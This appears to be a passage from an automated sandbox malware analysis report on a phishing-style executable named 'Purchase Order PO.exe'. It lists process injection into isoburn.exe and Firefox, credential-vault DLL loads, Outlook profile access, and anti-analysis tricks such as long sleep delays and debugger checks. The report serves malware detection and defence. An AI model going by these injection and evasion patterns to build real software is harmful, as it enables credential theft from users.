                Source: unknown Process created: C:\Users\user\Desktop\Purchase Order PO.exe "C:\Users\user\Desktop\Purchase Order PO.exe"
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Process created: C:\Users\user\Desktop\Purchase Order PO.exe "C:\Users\user\Desktop\Purchase Order PO.exe"
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe Process created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"
                Source: C:\Windows\SysWOW64\isoburn.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Section loaded: windowscodecs.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\Purchase Order PO.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: Purchase Order PO.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Purchase Order PO.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: isoburn.pdb source: Purchase Order PO.exe, 00000002.00000002.2132616252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, QfgdvbjddZ.exe, 00000006.00000002.4169823337.0000000001298000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: isoburn.pdbGCTL source: Purchase Order PO.exe, 00000002.00000002.2132616252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, QfgdvbjddZ.exe, 00000006.00000002.4169823337.0000000001298000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QfgdvbjddZ.exe, 00000006.00000002.4169230923.000000000060E000.00000002.00000001.01000000.0000000C.sdmp, QfgdvbjddZ.exe, 00000008.00000002.4169232027.000000000060E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: Purchase Order PO.exe, 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000007.00000003.2131525150.0000000004C74000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000007.00000003.2135458360.0000000004E29000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Purchase Order PO.exe, Purchase Order PO.exe, 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000007.00000003.2131525150.0000000004C74000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000007.00000003.2135458360.0000000004E29000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: 0.2.Purchase Order PO.exe.3eb31a0.3.raw.unpack, N8UBb3uLZruqHjVZ8x.cs .Net Code: NZHcFhG3lK System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Purchase Order PO.exe.7910000.5.raw.unpack, N8UBb3uLZruqHjVZ8x.cs .Net Code: NZHcFhG3lK System.Reflection.Assembly.Load(byte[])
                Source: Purchase Order PO.exe Static PE information: section name: .text entropy: 7.872500225134944
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                Source: Yara matchFile source: Process Memory Space: Purchase Order PO.exe PID: 6700, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\Purchase Order PO.exeMemory allocated: 1140000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeMemory allocated: 2BE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeMemory allocated: 1170000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeMemory allocated: 79A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeMemory allocated: 89A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeMemory allocated: 8B50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeMemory allocated: 9B50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD096E rdtsc 2_2_01AD096E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeWindow / User API: threadDelayed 6216Jump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeWindow / User API: threadDelayed 3756Jump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\isoburn.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\Purchase Order PO.exe TID: 6740Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exe TID: 4324Thread sleep count: 6216 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exe TID: 4324Thread sleep time: -12432000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exe TID: 4324Thread sleep count: 3756 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exe TID: 4324Thread sleep time: -7512000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe TID: 5024Thread sleep time: -65000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe TID: 5024Thread sleep count: 31 > 30Jump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe TID: 5024Thread sleep time: -46500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe TID: 5024Thread sleep count: 33 > 30Jump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe TID: 5024Thread sleep time: -33000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_02D2C4E0 FindFirstFileW,FindNextFileW,FindClose,7_2_02D2C4E0
                Source: isoburn.exe, 00000007.00000002.4169460570.0000000003037000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll`$Dw\
                Source: QfgdvbjddZ.exe, 00000008.00000002.4169902840.00000000012FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
                Source: firefox.exe, 00000009.00000002.2436258729.000001B2D7D7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_00417723 LdrLoadDll,2_2_00417723
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD0185 mov eax, dword ptr fs:[00000030h]2_2_01AD0185
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9A2C3 mov eax, dword ptr fs:[00000030h]2_2_01A9A2C3
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9A2C3 mov eax, dword ptr fs:[00000030h]2_2_01A9A2C3
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9A2C3 mov eax, dword ptr fs:[00000030h]2_2_01A9A2C3
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9A2C3 mov eax, dword ptr fs:[00000030h]2_2_01A9A2C3
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A8823B mov eax, dword ptr fs:[00000030h]2_2_01A8823B
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B40274 mov eax, dword ptr fs:[00000030h]2_2_01B40274
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B40274 mov eax, dword ptr fs:[00000030h]2_2_01B40274
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B40274 mov eax, dword ptr fs:[00000030h]2_2_01B40274
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B40274 mov eax, dword ptr fs:[00000030h]2_2_01B40274
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B40274 mov eax, dword ptr fs:[00000030h]2_2_01B40274
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B40274 mov eax, dword ptr fs:[00000030h]2_2_01B40274
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B40274 mov eax, dword ptr fs:[00000030h]2_2_01B40274
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B40274 mov eax, dword ptr fs:[00000030h]2_2_01B40274
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B40274 mov eax, dword ptr fs:[00000030h]2_2_01B40274
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B40274 mov eax, dword ptr fs:[00000030h]2_2_01B40274
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B40274 mov eax, dword ptr fs:[00000030h]2_2_01B40274
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B40274 mov eax, dword ptr fs:[00000030h]2_2_01B40274
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A8826B mov eax, dword ptr fs:[00000030h]2_2_01A8826B
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A94260 mov eax, dword ptr fs:[00000030h]2_2_01A94260
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A94260 mov eax, dword ptr fs:[00000030h]2_2_01A94260
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A94260 mov eax, dword ptr fs:[00000030h]2_2_01A94260
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A96259 mov eax, dword ptr fs:[00000030h]2_2_01A96259
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B18243 mov eax, dword ptr fs:[00000030h]2_2_01B18243
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B18243 mov ecx, dword ptr fs:[00000030h]2_2_01B18243
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A8A250 mov eax, dword ptr fs:[00000030h]2_2_01A8A250
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B105A7 mov eax, dword ptr fs:[00000030h]2_2_01B105A7
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B105A7 mov eax, dword ptr fs:[00000030h]2_2_01B105A7
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B105A7 mov eax, dword ptr fs:[00000030h]2_2_01B105A7
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB45B1 mov eax, dword ptr fs:[00000030h]2_2_01AB45B1
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB45B1 mov eax, dword ptr fs:[00000030h]2_2_01AB45B1
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC4588 mov eax, dword ptr fs:[00000030h]2_2_01AC4588
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A92582 mov eax, dword ptr fs:[00000030h]2_2_01A92582
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A92582 mov ecx, dword ptr fs:[00000030h]2_2_01A92582
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACE59C mov eax, dword ptr fs:[00000030h]2_2_01ACE59C
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACC5ED mov eax, dword ptr fs:[00000030h]2_2_01ACC5ED
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACC5ED mov eax, dword ptr fs:[00000030h]2_2_01ACC5ED
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A925E0 mov eax, dword ptr fs:[00000030h]2_2_01A925E0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABE5E7 mov eax, dword ptr fs:[00000030h]2_2_01ABE5E7
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABE5E7 mov eax, dword ptr fs:[00000030h]2_2_01ABE5E7
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABE5E7 mov eax, dword ptr fs:[00000030h]2_2_01ABE5E7
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABE5E7 mov eax, dword ptr fs:[00000030h]2_2_01ABE5E7
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABE5E7 mov eax, dword ptr fs:[00000030h]2_2_01ABE5E7
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABE5E7 mov eax, dword ptr fs:[00000030h]2_2_01ABE5E7
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABE5E7 mov eax, dword ptr fs:[00000030h]2_2_01ABE5E7
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABE5E7 mov eax, dword ptr fs:[00000030h]2_2_01ABE5E7
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACE5CF mov eax, dword ptr fs:[00000030h]2_2_01ACE5CF
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACE5CF mov eax, dword ptr fs:[00000030h]2_2_01ACE5CF
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A965D0 mov eax, dword ptr fs:[00000030h]2_2_01A965D0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACA5D0 mov eax, dword ptr fs:[00000030h]2_2_01ACA5D0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACA5D0 mov eax, dword ptr fs:[00000030h]2_2_01ACA5D0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABE53E mov eax, dword ptr fs:[00000030h]2_2_01ABE53E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABE53E mov eax, dword ptr fs:[00000030h]2_2_01ABE53E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABE53E mov eax, dword ptr fs:[00000030h]2_2_01ABE53E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABE53E mov eax, dword ptr fs:[00000030h]2_2_01ABE53E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABE53E mov eax, dword ptr fs:[00000030h]2_2_01ABE53E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0535 mov eax, dword ptr fs:[00000030h]2_2_01AA0535
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0535 mov eax, dword ptr fs:[00000030h]2_2_01AA0535
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0535 mov eax, dword ptr fs:[00000030h]2_2_01AA0535
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0535 mov eax, dword ptr fs:[00000030h]2_2_01AA0535
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0535 mov eax, dword ptr fs:[00000030h]2_2_01AA0535
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0535 mov eax, dword ptr fs:[00000030h]2_2_01AA0535
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B26500 mov eax, dword ptr fs:[00000030h]2_2_01B26500
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B64500 mov eax, dword ptr fs:[00000030h]2_2_01B64500
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B64500 mov eax, dword ptr fs:[00000030h]2_2_01B64500
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B64500 mov eax, dword ptr fs:[00000030h]2_2_01B64500
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B64500 mov eax, dword ptr fs:[00000030h]2_2_01B64500
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B64500 mov eax, dword ptr fs:[00000030h]2_2_01B64500
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B64500 mov eax, dword ptr fs:[00000030h]2_2_01B64500
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B64500 mov eax, dword ptr fs:[00000030h]2_2_01B64500
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC656A mov eax, dword ptr fs:[00000030h]2_2_01AC656A
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC656A mov eax, dword ptr fs:[00000030h]2_2_01AC656A
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC656A mov eax, dword ptr fs:[00000030h]2_2_01AC656A
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A98550 mov eax, dword ptr fs:[00000030h]2_2_01A98550
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A98550 mov eax, dword ptr fs:[00000030h]2_2_01A98550
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B1A4B0 mov eax, dword ptr fs:[00000030h]2_2_01B1A4B0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A964AB mov eax, dword ptr fs:[00000030h]2_2_01A964AB
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC44B0 mov ecx, dword ptr fs:[00000030h]2_2_01AC44B0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A904E5 mov ecx, dword ptr fs:[00000030h]2_2_01A904E5
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A8E420 mov eax, dword ptr fs:[00000030h]2_2_01A8E420
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A8E420 mov eax, dword ptr fs:[00000030h]2_2_01A8E420
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A8E420 mov eax, dword ptr fs:[00000030h]2_2_01A8E420
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A8C427 mov eax, dword ptr fs:[00000030h]2_2_01A8C427
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B16420 mov eax, dword ptr fs:[00000030h]2_2_01B16420
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B16420 mov eax, dword ptr fs:[00000030h]2_2_01B16420
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B16420 mov eax, dword ptr fs:[00000030h]2_2_01B16420
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B16420 mov eax, dword ptr fs:[00000030h]2_2_01B16420
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B16420 mov eax, dword ptr fs:[00000030h]2_2_01B16420
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B16420 mov eax, dword ptr fs:[00000030h]2_2_01B16420
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B16420 mov eax, dword ptr fs:[00000030h]2_2_01B16420
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC8402 mov eax, dword ptr fs:[00000030h]2_2_01AC8402
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC8402 mov eax, dword ptr fs:[00000030h]2_2_01AC8402
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC8402 mov eax, dword ptr fs:[00000030h]2_2_01AC8402
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B1C460 mov ecx, dword ptr fs:[00000030h]2_2_01B1C460
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABA470 mov eax, dword ptr fs:[00000030h]2_2_01ABA470
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABA470 mov eax, dword ptr fs:[00000030h]2_2_01ABA470
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABA470 mov eax, dword ptr fs:[00000030h]2_2_01ABA470
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACE443 mov eax, dword ptr fs:[00000030h]2_2_01ACE443
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACE443 mov eax, dword ptr fs:[00000030h]2_2_01ACE443
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACE443 mov eax, dword ptr fs:[00000030h]2_2_01ACE443
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACE443 mov eax, dword ptr fs:[00000030h]2_2_01ACE443
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACE443 mov eax, dword ptr fs:[00000030h]2_2_01ACE443
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACE443 mov eax, dword ptr fs:[00000030h]2_2_01ACE443
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACE443 mov eax, dword ptr fs:[00000030h]2_2_01ACE443
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACE443 mov eax, dword ptr fs:[00000030h]2_2_01ACE443
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB245A mov eax, dword ptr fs:[00000030h]2_2_01AB245A
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A8645D mov eax, dword ptr fs:[00000030h]2_2_01A8645D
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A907AF mov eax, dword ptr fs:[00000030h]2_2_01A907AF
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B3678E mov eax, dword ptr fs:[00000030h]2_2_01B3678E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB27ED mov eax, dword ptr fs:[00000030h]2_2_01AB27ED
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB27ED mov eax, dword ptr fs:[00000030h]2_2_01AB27ED
